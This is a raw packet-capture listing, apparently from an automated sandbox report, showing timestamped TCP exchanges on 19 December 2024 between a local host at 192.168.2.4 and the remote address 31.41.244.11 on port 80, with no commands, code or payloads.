                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.685967922 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.686794043 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.686827898 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.686867952 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.686867952 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.688251972 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.688290119 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.688419104 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.688973904 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.689013004 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.689065933 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.689065933 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.689991951 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.690026045 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.690079927 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.690079927 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.690771103 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.690804958 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.690970898 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.691765070 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.692506075 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.692667007 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.693217039 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.693252087 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.693294048 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.693294048 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.693608999 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.693656921 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.694262981 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.694339037 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.695055962 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.695163012 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.695652962 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.696408987 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.696444035 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.696487904 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.696487904 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.697192907 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.697227001 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.697264910 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.697273016 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.699599981 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.699635983 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.699764967 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.701134920 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.701169014 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.701191902 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.701415062 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.701797962 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.701836109 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.701944113 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.702568054 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.702636957 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.703214884 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.703360081 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.704874039 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.704907894 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.704946995 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.704946995 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.705655098 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.705780029 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.706306934 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.706377029 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.706994057 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.707046032 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.707091093 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.707091093 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.707762957 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.707839966 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.707928896 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.708635092 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.708668947 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.708704948 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.708704948 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.710097075 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.710130930 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.710180044 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.710180044 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.710855961 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.710891008 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.710932970 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.710932970 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.711700916 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.712060928 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.847709894 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.847845078 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.847887039 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.847913980 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.848247051 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.848289013 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.848426104 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.848465919 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.849387884 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.849457979 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.849508047 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.850636005 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.850763083 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.851044893 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.851125002 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.851778030 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.851814032 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.851859093 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.851859093 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.852977037 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.853030920 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.853671074 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.856093884 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.856128931 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.856195927 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.856195927 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.858006001 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.858046055 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.858093977 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.858093977 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.860466957 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.860502958 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.860573053 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.862590075 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.862632036 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.862771988 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863250971 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863285065 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863338947 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863338947 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863341093 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863445044 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863821030 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863898039 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863898039 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863934994 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863976955 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.863976955 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.864773035 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.864809036 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.864842892 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.864850998 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.864850998 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.864944935 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.865521908 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.865557909 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.865591049 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.865628958 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.865633965 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.865633965 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.865809917 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.866261959 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.866359949 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.866396904 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.866405010 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.866405010 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.866516113 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.866955042 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.866991043 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.867024899 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.867038965 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.867038965 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.867078066 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.867566109 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.867624044 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.867634058 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.867680073 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.867719889 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.867719889 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.868124962 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.868161917 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.868180037 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.868227959 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.868560076 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.868594885 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.868614912 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.868663073 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.869960070 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.869997025 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.870157957 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.870847940 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.870883942 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.870929956 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.870929956 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.872423887 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.872462034 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.872490883 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.872551918 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.872790098 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.872864962 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.873397112 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.874042988 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.874078035 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.874130964 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.874130964 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.874876022 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.874912977 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.874957085 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.874957085 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.875941992 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.876050949 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.876694918 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.876760960 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.877228975 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.877264023 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.877280951 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.877315998 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.878118038 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.878154993 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.878232002 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.878755093 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.878861904 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.879414082 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.879514933 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.880323887 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.880362988 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.880400896 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.880414963 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.880961895 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.881119967 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.881767035 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.881880045 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.882416964 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.882452965 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.882493973 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.882493973 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.883224964 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.883260012 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.883279085 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.883332968 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.885016918 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.885126114 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.885169029 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.885169029 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.885911942 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.885953903 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.885998011 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.885998011 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.886845112 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.886863947 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.886907101 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.886920929 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.887592077 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.887639999 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.888468981 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.888557911 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.889163017 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.889405012 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.889965057 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.890023947 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.890959978 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.890980005 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.891089916 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.893609047 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.893621922 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.893723965 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.895083904 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.895097017 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.895140886 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.895184040 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.895797968 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.895811081 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.895859003 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.895859003 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.896694899 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.896706104 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.896754026 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.896781921 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.897891045 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.897906065 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.897995949 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.898612976 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.898689032 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.899266005 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.899337053 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.899838924 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.899854898 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.899950027 CET4977280192.168.2.431.41.244.11
